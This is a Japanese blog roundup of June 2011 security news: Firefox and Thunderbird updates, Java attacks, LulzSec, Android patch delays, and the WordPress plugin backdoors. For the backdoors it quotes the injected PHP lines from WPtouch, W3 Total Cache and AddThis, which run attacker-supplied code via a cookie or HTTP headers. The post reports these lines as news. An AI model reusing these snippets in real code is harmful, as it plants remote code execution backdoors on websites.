- 「Firefox 5」正式版が公開、今後は 6 週間おきに新バージョンに (INTERNET Watch)
- Mozilla、脆弱性を修正した「Firefox」v3.6.18 と「Thunderbird」v3.1.11 を公開 (窓の杜) 「Firefox」v4 シリーズにも脆弱性が存在するが、同日公開された v5 で修正済み。v4 シリーズのユーザーは速やかに v5 へアップデートすること …
- リリース: Oracle VM Server for x86 2.2.2 (virtualization.info)
- Java の脆弱性を突く攻撃に注意、偽ソフトを勝手にインストール (ITpro) この脆弱性は、2011 年 2 月に公開された Update 24 以降で修正されている。
- WordPress Forces Password Reset (SANS ISC)
最近アップデートされたプラグイン AddThis, WPtouch, W3 Total Cache にバックドアが仕掛けられてたらしい。WordPress.org, bbPress.org および BuddyPress.org にアカウントを持っているならパスワードを変更しなさい。ってさ。正規のプラグイン開発者が仕掛けたバックドアじゃないので第三者が WordPress.org のアカウント情報が漏れている可能性が否定できないってことね。あたりまえだけど元のパスワードは設定しないように。
- Warning: Backdoor in AddThis, WPtouch and W3 Total Cache plugins (WPSecurity Lock) Stable plugin versions as of June 22, 2011 at 8am CST: AddThis version 2.2.0 (last updated 6-20-2011), WPtouch version 1.9.29 (last updated 6-21-2011), W3 Total Cache version 0.9.2.3 (last updated 6-21-2011)
- Add This, W3 Total Cache, WPtouch backdoors (Adam Harley)
こんなに簡単にバックドアが仕掛けられるなんてすごいな。もっと別のことに頭を使えばいいのに。
WPtouchif (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2])) $this->desired_view = $matches[1].$matches[2];W3 Total Cache
if (isset($_SERVER['HTTP_X_FORWARD_FOR']) && assert($_SERVER['HTTP_X_FORWARD_FOR'])) { $this->cache_reject_reason = 'proxy';Add This
$addthis_languages = array(''=>'Automatic', [...] 'th'=>'Thai', 'ur'=>'Urdu', 'cy'=>'Welsh', 'vi'=>'Vietnamese', 're'=>@assert(wp_get_referer()));
- SSL 認証局を狙った攻撃がまた発生、証明書の発行を中止 (ITmedia) StartSS はイスラエルの StartCom が運営する SSL 認証局。
- 英警察、ハッキング容疑で 19 歳男性を逮捕 –LulzSec の首謀者か (CNET Japan)
- 本当の Anonymous が知りたいの (@IT)
- ウェブ教材「5 分でできる著作権教育」、小・中・高の教員向けに公開 (INTERNET Watch)
- Android ユーザーに悪夢再来か (ITpro)
- オープンゆえにリスクも高い Android – モバイルセキュリティの新常識 (ITpro)
- Android 端末の脆弱性対策、10 カ月放置のメーカーも~ IPA がレポート (INTERNET Watch) Android 端末は PC と比べて、脆弱性対策に時間を要するとの見方を示している。「Android OS 自体に脆弱性のセキュリティパッチが提供された場合でも、Android 端末のメーカーは機種それぞれにおいて、Android OS に独自の仕様を加えて搭載しているため、それぞれの機種に対応させるまで時間がかかる傾向にある。」 …
- クリックの時代は終わった !? バナーのディスプレイ効果を検証する (japan.internet.com) 年収が低くなるのにつれて “Heavy Clicks” の割合が高くなる … “Non Clicker” が Portal サイトや検索サイト、ニュースサイト、ファイナンス系サイトによく滞在しているのに対して、 “Heavy Clicker” はギャンブル系サイトや転職サイト、ゲームサイトによく滞在している …
Firefox 5.0/3.6.18, Thunderbird 3.1.11
ニュース